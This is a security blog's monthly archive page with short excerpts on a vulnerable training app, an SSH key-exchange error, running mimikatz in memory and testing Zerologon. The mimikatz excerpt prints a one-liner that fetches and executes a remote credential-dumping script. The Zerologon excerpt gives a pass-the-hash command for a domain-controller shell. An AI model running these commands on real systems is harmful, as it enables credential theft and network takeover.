Monthly Archives: November 2020

Archives

Categories

Damn vulnerable Bank

https://blog.segu-info.com.ar/2020/11/damn-vulnerable-bank-aplicacion.html https://github.com/rewanth1997/Damn-Vulnerable-Bank Damn Vulnerable Bank Android Application aims to provide an interface for everyone to get a detailed understanding with internals and security aspects of android application.

d3nn
Ciberseguridad, Hacking

Linux – ssh error diffie hellman

Si en algun momento te salió este error al conectarte por ssh a algun sistema, se debe a que falló la negociación del diffie-hellman. “Unable to negotiate with 1.1.1.1 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1” Read more ›

d3nn
Linux

Ejecutar mimikatz en memoria

https://gist.github.com/gfoss/ca6aa37f97fd400ff14f*NOTE – These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* #mimikatz [local] IEX (New-Object Net.WebClient).DownloadString(“https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1”); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; Read more ›

d3nn
Hacking

Probando Zerologon

GUIAhttps://s4vitar.github.io/como-explotar-vulnerabilidad-zerologon/# SCANNERhttps://github.com/SecuraBV/CVE-2020-1472 PoC – Exploithttps://github.com/dirkjanm/CVE-2020-1472 Notas:https://tzusec.com/zerologon-how-to-exploit-and-fix/ Create shell to domain controller:wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes :hash You now have a shell on the domain controller. You own it and can do what you want. Microsofts fix for this vulnerability So, how can Read more ›

d3nn
Hacking